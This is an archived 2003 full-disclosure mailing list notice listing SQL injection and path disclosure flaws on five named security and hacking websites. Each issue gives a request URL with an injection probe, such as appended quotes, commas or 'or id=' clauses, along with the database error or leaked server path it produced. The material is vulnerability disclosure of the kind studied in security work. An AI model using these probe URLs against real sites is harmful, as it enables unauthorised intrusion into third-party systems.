lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: mordred at s-mail.com (Sir Mordred) Subject: @(#)Mordred Security Notice - exporing the hacking websites // @(#)Mordred Labs security notice - exploring the hacking websites Release date: May 5, 2003 Author: Sir Mordred (mordred@...ail.com) I. INTRODUCTION It is a first security notice about the real state of web app security with the real world examples. In this issue we will be focusing on websites related to hacking. Security companies and news portals will be discussed later. For now, it would be nice to see the reaction of the community on this issue. Looking at this notice, one can clearly see, that the combination of ASP/PHP and relational database is a very dangerous, even the "security experts" make mistakes :-). Surely, not all of the vulnerabilities have been found/disclosed. For example, there was no testing for CSS vulnerabilities at all. Note that the vulnerabilities are presented here in the following format: * ISSUE <number> - description of the vulnerability blank line the url to demonstrate this vulnerability blank line the error message (if exists) One last word to tripz: thanks for the help. II. DETAILS 1) ---------------------- www.progenic.com ------------------------------ It seems that the primary goal of this website, created "for the love of the scene", is to maintain a large collection of links to security/hacking resources. * ISSUE 1 - SQL injection in /vote/default.asp page http://www.progenic.com/vote/?id=e',s Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near ','. /vote/Default.asp, line 154 * ISSUE 2 - SQL injection in /info/default.asp page http://www.progenic.com/info/default.asp?id=.' Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '.''. /info/Default.asp, line 32 2) --------------------- www.hackinthebox.org -------------------------- <quote> Hack In The Box is designed to facilitate discussions on security related topics, create security awareness, and to try and provide a comprehensive database of security knowledge and resources to the public </quote> Rather interesting website, the nice thing about it is that HITB opened source code of certain parts of the website, i did not bother to look at their source though. * ISSUE 1 - SQL injection in /memberlist.php page http://www.hackinthebox.org/memberlist.php?letter=A&sortby=uname, 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ' LIKE '%' ORDER BY uname,' at line 1 3) ---------------------- www.hackerscenter.com ----------------------- <quote> The best resource for hackers and crackers: tons of tools, tutorials, books, articles, analysis. Join our Top%0 or enjoy our Online tools!!! </qoute> * ISSUE 1 - SQL injection in /top50/default.asp page http://www.hackerscenter.com/top50/default.asp?id=9,' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query expression 'id=9,''. /top50/default.asp, line 249 * ISSUE 2 - SQL injection in /downloads/download.asp page http://www.hackerscenter.com/downloads/download.asp?id=7,&area=HACKING Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query expression 'id=7,'. /downloads/download.asp, line 37 * ISSUE 3 - SQL injection in /articles/article.asp page Visiting the url http://www.hackerscenter.com/articles/article.asp?id=28 gives us back their article "Securing Windows". However, visiting the url http://www.hackerscenter.com/articles/article.asp?id=28111 gives us back the error page with the message "Exception occured in /articles/article.asp, line 129". But visiting http://www.hackerscenter.com/articles/article.asp?id=28111+or+id=28 gives us the above article. * ISSUE 4 - SQL injection in /articles/archive.asp http://www.hackerscenter.com/articles/archive.asp?searchstring=SQL&field='SU BJECT Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Validated=True AND 'SUBJECT LIKE '%%%SQL%%%' ORDER BY 'SUBJECT DESC'. /articles/archive.asp, line 154 4) --------------------------------- www.codeingtheweb.net --------------------------- <quote> We deal in security new, security programs and virus alers. We also have an online messenger system, top50, forum etc. An amazing site! </quote> * ISSUE 1 - SQL injection in /top50/index.php page http://www.codeingtheweb.net/top50/index.php?cid=1'\1 You have an error in your SQL syntax near '\'\\1 order by thin DESC,ranks DESC,star DESC,thout DESC limit 0,50' at line 1 5) -------------------------------- www.ebcvg.com ----------------------------------- <quote> eBCVG.com is a security portal dedicated to providing security professionals with the knowledge and resources needed to help protect all of their data. applications ... etc... It was developed by IT and security experts to facilitate discussion on security related topics, promote security awareness and to provide comprehensive and helpful database of security. </quote> * ISSUE 1 - Path disclosure in /articles.php page http://www.ebcvg.com/articles.php?id=' Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/1111146160/www/web/articles.php on line 37 Unabled to read from database. * ISSUE 2 - SQL injection in /articles.php page Visiting the url http://www.ebcvg.com/articles.php?id=126 gives us back the article "Copying Copy Protected CD's". However, visiting the http://www.ebcvg.com/articles.php?id=12611 gives us the page with the error message "Unabled to read from database". But the url http://www.ebcvg.com/articles.php?id=12611+or+id=126 gives us the above article. * ISSUE 3 - Path disclosure in /download.php http://www.ebcvg.com/download.php?id=' Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/1111146160/www/web/download.php on line 7 Warning: Cannot add header information - headers already sent by (output started at /home/1111146160/www/web/download.php:7) in /home/1111146160/www/web/download.php on 12 * ISSUE 4 - SQL injection in /download.php This is almost identical to the issue 2, only the url is http://www.ebcvg.com/download.php?id=<id number> ________________________________________________________________________ This letter has been delivered unencrypted. We'd like to remind you that the full protection of e-mail correspondence is provided by S-mail encryption mechanisms if only both, Sender and Recipient use S-mail. Register at S-mail.com: http://www.s-mail.com
Powered by blists - more mailing lists